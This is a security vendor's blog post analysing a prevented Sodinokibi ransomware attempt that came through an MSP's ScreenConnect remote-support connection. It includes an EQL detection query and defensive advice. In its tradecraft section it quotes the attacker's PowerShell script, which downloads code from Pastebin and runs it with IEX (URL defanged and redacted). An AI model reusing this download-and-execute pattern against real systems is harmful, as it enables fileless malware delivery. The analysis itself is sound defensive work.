Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.

blog-shattered-lock-banner.jpg

blog-shattered-lock-thumb.jpg

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)

blog-security-breach-red-lock-banner.jpg

blog-security-breach-red-lock-thumb.jpg

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)

Last month, the <a href="/blog/introducing-elastic-endpoint-security">Elastic Security</a> Protections Team prevented an attempted ransomware attack targeting an organization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts that were generated after an adversary’s process injection attempts were prevented by <a href="/products/endpoint-security">Elastic Endpoint Security</a> on several endpoints. Adversaries often attempt to inject their malicious code into a running process before encrypting and holding the victim’s data to ransom.
The behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in order to deploy ransomware at an enterprise scale. By abusing the trust relationships between MSPs and their customers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with transportation, or even disrupting a critical municipal public service.
It is important to note in this case that the adversary accessed the target environment via another MSP, who is not an Elastic Security customer — we do not have specific details about that environment or how it may have been compromised.
In this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often successful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.
<table style="background: #FFFFD2;" rel="background: #FFFFD2;">
<tbody>
<tr>
	<td>Elastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses anonymized security telemetry from participating customers to track threats and improve products, a function that includes collecting alert metadata. By monitoring patterns of events affecting many customers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging threats or provide the community with essential information.
	</td>
</tr>
</tbody>
</table><h2>Preventing malicious process injection</h2>The earliest evidence of compromise was detected when several <a href="https://attack.mitre.org/techniques/T1055/">process injection</a> attempts were prevented. Process injection can be used to execute code in the address space of a running process. Adversaries often execute this technique in an attempt to avoid detection by security products, or to run their malicious code in a process running at a higher integrity level to elevate their privileges.
<img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0e931adeb1ae4bfd/5de55b56546f955ab898caa6/ransomware-prevention-blog-process-injection-alerts.png" data-sys-asset-uid="blt0e931adeb1ae4bfd" alt="ransomware-prevention-blog-process-injection-alerts.png" style="display: block; margin: auto; border:1px solid black;">
<figcaption style="text-align: center;" rel="text-align: center;">Process Injection alerts in the Elastic Endpoint Security platform</figcaption>Analyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was leveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. The <code>powershell.exe</code> process was created as a descendant of <code>ScreenConnect.WindowsClient.exe</code> — a remote desktop support application. This type of software is used to allow IT administrators to connect to remote computers and provide support to end users, but applications like this are often abused by adversaries — a tactic known as “living off the land.”
The figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization that displays events associated with an attack.
<img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt99a68ebf6b2fa11e/5dd85905cbf96739d40873e2/ransomware-prevention-blog-resolver.jpg" data-sys-asset-uid="blt99a68ebf6b2fa11e" alt="" style="display: block; margin: auto; border:1px solid black;">
<figcaption style="text-align: center;" rel="text-align: center;">Resolver™ showing the process lineage associated with the Process Injection attempt</figcaption>Notice that <code>cmd.exe</code> and <code>powershell.exe</code> are both descendants of the <code>ScreenConnect.WindowsClient.exe</code> process. This is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not necessarily indicate malicious activity. Baselining your environment and understanding normal process relationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.
In this case, reviewing the processes and their command line arguments revealed that the adversary leveraged ScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of the <code>cmd.exe</code> processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script that was subsequently executed.
<h2>Detecting and preventing unwanted behaviors with EQL</h2>While this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak, many MSPs are still coming to grips with this methodology. This adversary understands that service providers often have implicit trust with their customers and that makes providers of all kinds valuable.
Once an adversary has obtained initial access to their target environment, it is typical for them to seek out and abuse implicit trust relationships as seen in this case. The victim organization trusts the connections to their environment from their MSP via the remote desktop support application, which introduces the risk of <a href="https://attack.mitre.org/techniques/T1195/">supply chain compromise</a>.
When considering how to monitor and defend these trust relationships, focusing on applications that connect from the trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect may not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel from being effective. However, a security monitoring team may decide that a descendant process of ScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. This is possible using <a href="https://www.endgame.com/blog/technical-blog/getting-started-eql">Elastic’s Event Query Language (EQL)</a> and is a generic approach to developing environmental awareness.
The following EQL query searches for a sequence of two events that are tied together using the process’s unique process ID (PID). The first event looks for a process that is a descendant of <code>ScreenConnect*.exe</code>. The second event looks for network activity from the descendant process. This query can easily be expanded to include other remote access software or filter expected activity in your environment.
<pre class="prettyprint">sequence by unique_pid
 [process where descendant of [process where process_name == "ScreenConnect*.exe"]]
 [network where true]
</pre>With Elastic Endpoint Security, it is also possible to configure a <a href="https://www.endgame.com/blog/executive-blog/what-is-reflex">Reflex response action</a>, which is a way for customers to implement their own custom prevention rules. For example, we can kill the descendant process when it establishes a network connection, which would prevent additional malicious code from being downloaded or command and control activity.
<img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d4886f851ceb49a/5dd85ad8fcb522353a694edf/ransomware-prevention-blog-reflex-response.png" data-sys-asset-uid="blt9d4886f851ceb49a" style="display: block; margin: auto; border:1px solid black;">
<figcaption style="text-align: center;" rel="text-align: center;">Configuring a Reflex response action in the Elastic Endpoint Security platform</figcaption>Elastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and prevent abnormal process relationships involving third-party administrative tools or binaries that are native to the Windows, MacOS, or Linux operating systems.
<h2>Analysis of adversary tradecraft</h2>The PowerShell script that was executed checked the processor architecture before utilizing the .NET <code>WebClient</code> class to download content from Pastebin and the <code>Invoke-Expression</code> (<code>IEX</code>) cmdlet to execute code. This is a popular technique amongst adversaries for downloading and executing code via PowerShell.
Pastebin is a plain text hosting and sharing service where legitimate users often share code snippets. However, malicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.
<pre>If ($ENV:PROCESSOR_ARCHITECTURE - contains 'AMD64') {
 Start - Process - FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" - argument "IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));Invoke-LJJJIWVSRIMKPOD;Start-Sleep -s 1000000;"
} else {
 IEX ((new - object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));
 Invoke - LJJJIWVSRIMKPOD;
 Start - Sleep - s 1000000;
}
</pre><figcaption style="text-align: center;" rel="text-align: center;">PowerShell script that downloaded content1 from pastebin.com
</figcaption>This behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that occurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects and extracts the staged injected code and strings. This feature ensured that we had full visibility into the behavior being prevented.
Searching <a href="https://www.virustotal.com/">VirusTotal</a> for some of the collected strings surfaced several specimens from the Sodinokibi ransomware family.
The following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the Sodinokibi or Gandcrab ransomware specimens as reported by <a href="https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/">BleepingComputer</a> and <a href="https://www.cynet.com/blog/ransomware-never-dies-analysis-of-new-sodinokibi-ransomware-variant/">Cynet</a>:
<ul>
	<li>The malicious actor utilized ScreenConnect remote desktop support software to connect from a compromised MSP to the target enterprise.</li>
	<li>ScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to download and inject malicious code from Pastebin.</li>
	<li>The PowerShell script contained cmdlets and strings (e.g., <code>Invoke-LJJJIWVSRIMKPOD</code> and <code>Start-Sleep</code>) that have been observed in other Sodinokibi ransomware campaigns.</li>
	<li>The strings that were collected from the injected threads are consistent with Sodinokibi ransomware samples that were submitted to VirusTotal within the last 24 hours.</li>
</ul>After the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack on the initial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same procedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were prevented.
<h2>Conclusion</h2>In this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and its customers and attempting to deploy ransomware. This highlights the importance of understanding the relationships that your organization has with third parties and the potential impact if those connections are abused.
Analyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop support software and executed a malicious script with the intention of downloading, injecting, and executing ransomware. All of the adversary’s attempts were prevented.
This case also demonstrates the importance of having a layered approach to security and being able to detect and prevent adversary behavior and fileless attacks. We dissected the attackers procedures and showed how EQL and Reflex can be used to create custom rules and responses.
Looking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.
<a href="https://github.com/elastic/elasticsearch/issues/49581">EQL support is being added to Elasticsearch</a>. Get notified about <a href="/endpoint-security/">Elastic Endpoint Security developments</a> or apply to be part of the <a href="/products/endpoint-security/contact">Early Access Program</a>.
1 — The content has since been removed from Pastebin by its creator or the Pastebin staff

Articles by David French

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)

Ransomware, interrupted: Sodinokibi and the supply chain

Products & Solutions

Company

Resources

SaaS

ORCHESTRATION

Articles by David French

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)

Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)

Ransomware, interrupted: Sodinokibi and the supply chain